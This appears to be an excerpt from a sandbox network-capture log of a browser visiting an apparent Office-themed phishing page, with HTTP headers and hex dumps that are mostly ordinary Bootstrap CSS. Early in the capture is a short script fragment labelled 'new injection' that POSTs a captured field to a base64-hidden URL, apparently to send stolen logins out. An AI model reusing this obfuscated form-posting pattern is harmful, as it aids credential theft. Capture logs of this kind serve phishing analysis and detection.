                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:54 GMT
                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                            Last-Modified: Mon, 31 Aug 2020 21:49:46 GMT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 18086
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC671INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 20 30 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 6c 6f 67 6f 75 74 2e 73 72 66 3f 63 74 3d 31 35 34 38 33 34 33 35 39 32 26 72 76 65 72 3d 36 34 2e 34 2e 36 34 35 36 2e 30 26 6c 63 3d 31 30 33 33 26 69 64 3d 35 30 31 33 39 32 22 20 68 65 69 67 68 74 3d 22 30 22 20 77 69 64 74 68 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 20 2d 2d 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en">... <iframe style="border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392" height="0" width="0"></iframe> --><head> <meta charset="UTF-8"> <meta name
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC679INData Raw: 34 78 74 64 45 38 62 36 58 70 65 6d 32 39 7a 4a 4e 46 46 44 39 6a 6d 6a 75 4a 35 49 30 5a 6d 43 68 6e 4f 41 75 33 35 6d 49 78 6e 35 52 79 65 50 58 36 6b 44 7a 33 39 72 5a 6d 58 39 6c 54 34 6d 73 70 77 52 38 50 64 61 49 49 37 66 36 44 4e 58 34 61 2f 62 62 7a 2f 6e 36 6b 2f 77 43 2f 68 72 39 30 76 32 6f 4e 49 31 62 78 42 2b 7a 52 38 52 4e 42 30 48 53 37 69 2b 76 72 37 77 4c 71 39 76 5a 32 64 6e 43 30 6b 31 78 4d 39 6c 4b 71 52 6f 69 67 73 7a 4d 78 41 43 67 45 6b 6b 41 56 2b 4e 66 2f 41 41 79 52 2b 31 62 2f 41 4e 47 79 66 45 4c 2f 41 4d 49 75 2b 2f 38 41 6a 56 66 69 33 69 6c 68 73 56 58 78 2b 48 64 4b 45 70 57 69 39 6b 33 31 38 6a 2b 73 76 6f 36 35 68 6c 2b 44 79 58 48 52 78 4e 57 45 47 36 6b 62 63 30 6b 72 2b 37 30 75 30 65 6a 66 38 45 73 4c 71 35 6b 2f 62
                                                                                                                                                                                                                            Data Ascii: 4xtdE8b6Xpem29zJNFFD9jmjuJ5I0ZmChnOAu35mIxn5RyePX6kDz39rZmX9lT4mspwR8PdaII7f6DNX4a/bbz/n6k/wC/hr90v2oNI1bxB+zR8RNB0HS7i+vr7wLq9vZ2dnC0k1xM9lKqRoigszMxACgEkkAV+Nf/AAyR+1b/ANGyfEL/AMIu+/8AjVfi3ilhsVXx+HdKEpWi9k318j+svo65hl+DyXHRxNWEG6kbc0kr+70u0ejf8EsLq5k/b
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC687INData Raw: 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 6e 65 77 20 69 6e 6a 65 63 74 69 6f 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 20 20 20 20 20 20 20 20 63 6f 75 6e 74 20 3d 20 63 6f 75 6e 74 20 2b 20 31 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 24 2e 61 6a 61 78 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 72 6c 3a 20 61 74 6f 62 28 66 69 6c 65 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 69 3a 20 61 69 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: erCase(); ///////////new injection//////////////// count = count + 1; $.ajax({ dataType: 'JSON', url: atob(file), type: 'POST', data: { ai: ai,


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            22192.168.2.649892104.18.10.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC689OUTGET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                                                                                            Host: stackpath.bootstrapcdn.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC690INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:54 GMT
                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            CDN-PullZone: 252412
                                                                                                                                                                                                                            CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                                                            CDN-RequestCountryCode: DE
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=31919000
                                                                                                                                                                                                                            Last-Modified: Mon, 25 Jan 2021 22:04:08 GMT
                                                                                                                                                                                                                            CDN-CachedAt: 12/27/2021 07:28:05
                                                                                                                                                                                                                            CDN-EdgeStorageId: 756
                                                                                                                                                                                                                            CDN-RequestPullCode: 200
                                                                                                                                                                                                                            CDN-RequestPullSuccess: True
                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            CDN-Status: 200
                                                                                                                                                                                                                            CDN-ProxyVer: 1.02
                                                                                                                                                                                                                            CDN-RequestId: 5a4f218ff2cc791bfca3e2943b0791a7
                                                                                                                                                                                                                            CDN-Cache: HIT
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Age: 9372265
                                                                                                                                                                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 70ad8f3e5d099a23-FRA
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC691INData Raw: 37 62 65 32 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31
                                                                                                                                                                                                                            Data Ascii: 7be2/*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#661
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC691INData Raw: 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d
                                                                                                                                                                                                                            Data Ascii: teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC693INData Raw: 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74
                                                                                                                                                                                                                            Data Ascii: e]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC694INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76
                                                                                                                                                                                                                            Data Ascii: ine-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:v
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC695INData Raw: 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 6f 75 74 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d
                                                                                                                                                                                                                            Data Ascii: -webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC697INData Raw: 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                                                                                                                                                                            Data Ascii: -width:100%;height:auto}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:90%;color:#6c757d}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC698INData Raw: 2e 63 6f 6c 2d 6c 67 2d 38 2c 2e 63 6f 6c 2d 6c 67 2d 39 2c 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d
                                                                                                                                                                                                                            Data Ascii: .col-lg-8,.col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC699INData Raw: 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 66 69 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64
                                                                                                                                                                                                                            Data Ascii: 666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-first{-ms-flex-order:-1;order:-1}.order-last{-ms-flex-order:13;order:13}.order-0{-ms-flex-order:0;order:0}.order-1{-ms-flex-order:1;order:1}.ord
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC701INData Raw: 63 6f 6c 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 35 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 36 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 73 6d 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33
                                                                                                                                                                                                                            Data Ascii: col-sm-4{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.col-sm-5{-ms-flex:0 0 41.666667%;flex:0 0 41.666667%;max-width:41.666667%}.col-sm-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.col-sm-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC702INData Raw: 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f
                                                                                                                                                                                                                            Data Ascii: argin-left:41.666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.333333%}.offset-sm-8{margin-left:66.666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.333333%}.offset-sm-11{margin-left:91.666667%}}@media (min-width:768px){.co
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC704INData Raw: 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 6d 64 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 6d 64 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 6d 64 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a 34 7d 2e 6f 72 64 65 72 2d 6d 64 2d 35 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 35 3b 6f 72 64 65 72 3a 35 7d 2e 6f 72 64 65 72 2d 6d 64 2d 36 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 36 3b 6f 72 64 65 72 3a 36 7d 2e 6f 72 64 65 72 2d 6d 64 2d 37 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 37 3b 6f 72 64 65 72 3a 37 7d 2e 6f 72 64 65 72 2d
                                                                                                                                                                                                                            Data Ascii: {-ms-flex-order:1;order:1}.order-md-2{-ms-flex-order:2;order:2}.order-md-3{-ms-flex-order:3;order:3}.order-md-4{-ms-flex-order:4;order:4}.order-md-5{-ms-flex-order:5;order:5}.order-md-6{-ms-flex-order:6;order:6}.order-md-7{-ms-flex-order:7;order:7}.order-
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC705INData Raw: 2d 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 36 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 6c 67 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6c 67 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30
                                                                                                                                                                                                                            Data Ascii: -width:41.666667%}.col-lg-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.col-lg-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-lg-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-lg-9{-ms-flex:0 0 75%;flex:0
